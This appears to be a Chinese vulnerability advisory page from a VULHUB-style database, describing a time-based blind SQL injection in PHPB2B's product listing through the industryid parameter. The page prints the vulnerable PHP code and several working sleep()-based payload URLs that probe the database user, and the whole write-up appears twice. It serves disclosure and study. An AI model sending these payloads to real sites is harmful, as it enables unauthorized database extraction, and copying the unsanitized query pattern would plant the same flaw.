|PHPB2B某处sql注入#3 - VULHUB开源网络安全威胁库

PHPB2B某处sql注入#3

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述： PHPB2B某处sql注入#3 ### 详细说明： PHPB2B某处sql注入官网最新版本 libraries/core/controllers/product_controller.php 176-187行 ``` function lists() { global $pos, $viewhelper; $viewhelper->setPosition(L("product_center", 'tpl'), 'index.php?do=product'); $viewhelper->setTitle(L("product_center", 'tpl')); setvar("module", "product"); $this->product->initSearch(); $result = $this->product->Search($pos, $this->displaypg); setvar("items", $result); $this->view->assign("total_count", $this->product->amount); render("product/list"); } ``` 这里调用了一个函数product->initsearch() 跟入 libraries/core/models/product_controller.php ``` function initSearch() { uses("industry","area"); $this->area = new Areas(); $this->industry = new Industries(); $this->condition[] = "Product.status=1 "; if (isset($_GET['industryid'])) { if (strpos($_GET['industryid'], ",")!==false) { $this->condition[]= "Product.industry_id IN (".trim($_GET['industryid']).")"; }else{ $industryid = intval($_GET['industryid']); $sub_ids = $this->industry->getSubDatas($industryid); $sub_ids = array_keys($sub_ids); $sub_ids = array_filter($sub_ids); $this->condition[]= "Product.industry_id IN (".implode(",", $sub_ids).")"; } } if (isset($_GET['areaid'])) { if (strpos($_GET['areaid'], ",")!==false) { $this->condition[]= "Product.area_id IN (".trim($_GET['areaid']).")"; }else{ $areaid = intval($_GET['areaid']); $this->condition[]= "Product.area_id='".$areaid."'"; } } if (isset($_GET['type'])) { if($_GET['type']=="commend"){ $this->condition[] = "Product.if_commend='1'"; } } if (!empty($_GET['typeid'])) { $this->condition[] = "Product.sort_id='".$_GET['typeid']."'"; } if(!empty($_GET['q'])) { $searchkeywords = strip_tags($_GET['q']); $this->condition[]= "Product.name like '%".$searchkeywords."%'"; } if (isset($_GET['pubdate'])) { switch ($_GET['pubdate']) { case "l3": $this->condition[] = "Product.created>".($this->timestamp-3*86400); break; case "l10": $this->condition[] = "Product.created>".($this->timestamp-10*86400); break; case "l30": $this->condition[] = "Product.created>".($this->timestamp-30*86400); break; default: break; } } if (!empty($_GET['total_count'])) { $this->amount = intval($_GET['total_count']); }else{ $this->amount = $this->findCount(); } if (!empty($_GET['orderby'])) { switch ($_GET['orderby']) { case "dateline": $this->orderby = "created DESC"; break; default: break; } } } ``` 代码大同小异，只看一处 ``` if (isset($_GET['industryid'])) { if (strpos($_GET['industryid'], ",")!==false) { $this->condition[]= "Product.industry_id IN (".trim($_GET['industryid']).")"; }else{ $industryid = intval($_GET['industryid']); $sub_ids = $this->industry->getSubDatas($industryid); $sub_ids = array_keys($sub_ids); $sub_ids = array_filter($sub_ids); $this->condition[]= "Product.industry_id IN (".implode(",", $sub_ids).")"; } } ``` 如果传入的industryid中存在逗号，就拼接后加入condition数组中，没有强制类型转换，也没有单引号保护。然后接着看libraries/core/models/product_controller.php $result = $this->product->Search($pos, $this->displaypg); 执行了搜索。其中又是一大堆拼接，转化，但是都跟我们没关系。我们直接看最后执行的sql语句。访问 ``` localhost/phpb2b/?do=product&action=list&industryid=1,234)||if((length(user())=0),sleep(30),0)%23 ``` [<img src="https://images.seebug.org/upload/201501/061643440b74a61ac0c3b55a61b0337bfebf413a.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/061643440b74a61ac0c3b55a61b0337bfebf413a.png) 于是可以注入啦 localhost/phpb2b/?do=product&action=list&industryid=1,234)||if((length(user())>10),sleep(30),0)%23 成功延时 localhost/phpb2b/?do=product&action=list&industryid=1,234)||if((length(user())>15),sleep(30),0)%23 不延时 localhost/phpb2b/?do=product&action=list&industryid=1,234)||if((length(user())=14),sleep(30),0)%23 延时成功确定user()长度为14位不再演示了。剩下的嘿嘿。。 ### 漏洞证明： PHPB2B某处sql注入官网最新版本 libraries/core/controllers/product_controller.php 176-187行 ``` function lists() { global $pos, $viewhelper; $viewhelper->setPosition(L("product_center", 'tpl'), 'index.php?do=product'); $viewhelper->setTitle(L("product_center", 'tpl')); setvar("module", "product"); $this->product->initSearch(); $result = $this->product->Search($pos, $this->displaypg); setvar("items", $result); $this->view->assign("total_count", $this->product->amount); render("product/list"); } ``` 这里调用了一个函数product->initsearch() 跟入 libraries/core/models/product_controller.php ``` function initSearch() { uses("industry","area"); $this->area = new Areas(); $this->industry = new Industries(); $this->condition[] = "Product.status=1 "; if (isset($_GET['industryid'])) { if (strpos($_GET['industryid'], ",")!==false) { $this->condition[]= "Product.industry_id IN (".trim($_GET['industryid']).")"; }else{ $industryid = intval($_GET['industryid']); $sub_ids = $this->industry->getSubDatas($industryid); $sub_ids = array_keys($sub_ids); $sub_ids = array_filter($sub_ids); $this->condition[]= "Product.industry_id IN (".implode(",", $sub_ids).")"; } } if (isset($_GET['areaid'])) { if (strpos($_GET['areaid'], ",")!==false) { $this->condition[]= "Product.area_id IN (".trim($_GET['areaid']).")"; }else{ $areaid = intval($_GET['areaid']); $this->condition[]= "Product.area_id='".$areaid."'"; } } if (isset($_GET['type'])) { if($_GET['type']=="commend"){ $this->condition[] = "Product.if_commend='1'"; } } if (!empty($_GET['typeid'])) { $this->condition[] = "Product.sort_id='".$_GET['typeid']."'"; } if(!empty($_GET['q'])) { $searchkeywords = strip_tags($_GET['q']); $this->condition[]= "Product.name like '%".$searchkeywords."%'"; } if (isset($_GET['pubdate'])) { switch ($_GET['pubdate']) { case "l3": $this->condition[] = "Product.created>".($this->timestamp-3*86400); break; case "l10": $this->condition[] = "Product.created>".($this->timestamp-10*86400); break; case "l30": $this->condition[] = "Product.created>".($this->timestamp-30*86400); break; default: break; } } if (!empty($_GET['total_count'])) { $this->amount = intval($_GET['total_count']); }else{ $this->amount = $this->findCount(); } if (!empty($_GET['orderby'])) { switch ($_GET['orderby']) { case "dateline": $this->orderby = "created DESC"; break; default: break; } } } ``` 代码大同小异，只看一处 ``` if (isset($_GET['industryid'])) { if (strpos($_GET['industryid'], ",")!==false) { $this->condition[]= "Product.industry_id IN (".trim($_GET['industryid']).")"; }else{ $industryid = intval($_GET['industryid']); $sub_ids = $this->industry->getSubDatas($industryid); $sub_ids = array_keys($sub_ids); $sub_ids = array_filter($sub_ids); $this->condition[]= "Product.industry_id IN (".implode(",", $sub_ids).")"; } } ``` 如果传入的industryid中存在逗号，就拼接后加入condition数组中，没有强制类型转换，也没有单引号保护。然后接着看libraries/core/models/product_controller.php $result = $this->product->Search($pos, $this->displaypg); 执行了搜索。其中又是一大堆拼接，转化，但是都跟我们没关系。我们直接看最后执行的sql语句。访问 ``` localhost/phpb2b/?do=product&action=list&industryid=1,234)||if((length(user())=0),sleep(30),0)%23 ``` [<img src="https://images.seebug.org/upload/201501/061643440b74a61ac0c3b55a61b0337bfebf413a.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/061643440b74a61ac0c3b55a61b0337bfebf413a.png) 于是可以注入啦 localhost/phpb2b/?do=product&action=list&industryid=1,234)||if((length(user())>10),sleep(30),0)%23 成功延时 localhost/phpb2b/?do=product&action=list&industryid=1,234)||if((length(user())>15),sleep(30),0)%23 不延时 localhost/phpb2b/?do=product&action=list&industryid=1,234)||if((length(user())=14),sleep(30),0)%23 延时成功确定user()长度为14位不再演示了。剩下的嘿嘿。。

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™